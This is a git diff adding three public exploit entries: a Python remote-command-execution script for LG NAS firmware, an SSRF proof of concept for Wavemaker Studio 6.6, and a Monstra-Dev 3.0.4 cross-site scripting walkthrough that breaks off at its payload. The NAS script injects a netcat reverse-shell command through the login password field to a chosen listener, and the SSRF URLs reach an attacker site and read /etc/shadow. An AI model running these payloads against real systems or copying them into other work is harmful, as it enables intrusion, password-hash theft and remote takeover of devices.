diff --git a/exploits/hardware/webapps/45109.py b/exploits/hardware/webapps/45109.py
new file mode 100755
index 000000000..7a0b0c807
--- /dev/null
+++ b/exploits/hardware/webapps/45109.py
@@ -0,0 +1,52 @@
+# LG NAS 3718.510.a0 - Remote Command Execution
+# Author: @0x616163
+# Date: 2018-07-29
+# Credits: https://www.vpnmentor.com/blog/critical-vulnerability-found-majority-lg-nas-devices/
+# CVE: N/A
+# Firmware Version: 3718.510.a0
+
+#!/usr/bin/env python
+
+import sys
+import argparse
+import requests
+from collections import OrderedDict
+
+def checkUser(target):
+ # Exploiting this vulnerability requires a valid user account
+ # on the target NAS otherwise the vulnerable code is not executed
+ parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass'), ('mobile', 'false')])
+ r = requests.post("http://" + target + ":8000/en/php/login_check.php", data=parameters)
+ if r.text == "NG:WRONG PASSWORD\n":
+ print "[*] Valid user found: admin"
+ return 0
+ elif r.text == "NG:NO USER\n":
+ print "[*] User not found: admin"
+ sys.exit(1)
+
+def sendPayload(target,lhost,lport):
+ print "[*] Sending payload.."
+ try:
+ parameters = OrderedDict([('op_mode', 'login'), ('id', 'admin'), ('password', 'pass;/usr/bin/nc ' + lhost + " " + lport + " " + '-e /bin/bash'), ('mobile', 'false')])
+ r = requests.post("http://" + target + "/en/php/login_check.php", data=parameters,timeout=0.001)
+ except requests.exceptions.ReadTimeout:
+ print "[*] Payload sent. Exiting."
+ sys.exit(0)
+
+ return 0
+def main():
+ parser = argparse.ArgumentParser(add_help=True, description='LG NAS Unauthenticated Remote Code Execution')
+ parser.add_argument('-t', action="store", dest='target', help='Target host or IP')
+ parser.add_argument('-l', action="store", dest='lhost', help='Local host or IP')
+ parser.add_argument('-p', action="store", dest='lport', help='Listening TCP port to connect back to')
+ results = parser.parse_args()
+ args = vars(results)
+ if len(sys.argv) < 1:
+ parser.print_help()
+ sys.exit(1)
+ else:
+ if checkUser(args['target']) == 0:
+ sendPayload(args['target'], args['lhost'],args['lport'])
+
+main()
+sys.exit(0)
\ No newline at end of file
diff --git a/exploits/java/webapps/45158.txt b/exploits/java/webapps/45158.txt
new file mode 100644
index 000000000..2ba2e9656
--- /dev/null
+++ b/exploits/java/webapps/45158.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Wavemaker Studio 6.6 - Server-Side Request Forgery (SSRF).
+# Exploit Author: Gionathan "John" Reale
+# Google Dork: N/A
+# Date: 2018-08-01
+# Vendor Homepage: http://www.wavemaker.com/
+# Software Link: https://github.com/cloudjee/wavemaker/blob/master/wavemaker/wavemaker-studio/
+# Affected Version: 6.6
+# Tested on: Parrot OS
+# CVE : N/A
+
+# Description
+# Wavemaker Studio 6.6 contains an exploitable unvaildated parameter allowing an
+# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
+# can also be exploited to access sensitive data or to use the server hosting Wavemaker
+# as a form of HTTP proxy among other things.
+
+# Proof Of Concept
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
+http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file///etc/shadow
+
+# Vulnerable Code
+# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
+
+# Line 419-430
+@ExposeToClient
+public String getContent(String inUrl) throws IOException {
+ try {
+ String str = getRemoteContent(inUrl);
+ str = str.replace("
", "");
+ return str;
+ } catch (Exception e) {
+ return "";
+ }
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/45156.txt b/exploits/php/webapps/45156.txt
new file mode 100644
index 000000000..e765a3a45
--- /dev/null
+++ b/exploits/php/webapps/45156.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Monstra-Dev 3.0.4 - Cross-Site Scripting
+# Date: 2018-08-04
+# Exploit Author: Nainsi Gupta
+# Vendor Homepage: http://monstra.org/
+# Software Link: https://github.com/monstra-cms/monstra
+# Product Name: Monstra-dev
+# Version: 3.0.4
+# Tested on: Windows 10 (Firefox/Chrome)
+# CVE : N/A
+
+# POC
+1- Go to the site ( http://server.com/monstra-dev/ ) .
+2- Click on Registration page (Registration) .
+3- Register by giving you name ,mail and soo on...
+4- Now log In i the website.
+5- After loggin in click on edit profile and in the frist name and last name copy paste this payload- in firsname paste ">